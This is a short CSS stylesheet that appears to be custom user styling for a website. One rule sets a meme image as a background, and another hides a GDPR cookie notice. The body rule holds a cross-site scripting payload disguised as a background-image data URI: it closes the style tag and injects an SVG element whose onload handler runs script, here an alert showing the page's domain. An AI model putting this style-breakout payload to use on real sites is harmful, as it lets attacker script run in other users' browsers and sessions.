div  {
    background-image: url("https://static0.gamerantimages.com/wordpress/wp-content/uploads/2023/07/hollow-knight-clown-meme.jpg?q=50&fit=crop&w=1296&h=891&dpr=1.5");
    background-color: #cccccc;
}
body {
	background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
	background-color: #FF0000;
 
}
._2brsq-_-_-client-components-gdpr-notification--notification-wrapper {
	background-color: red;
	visibility: hidden;
}
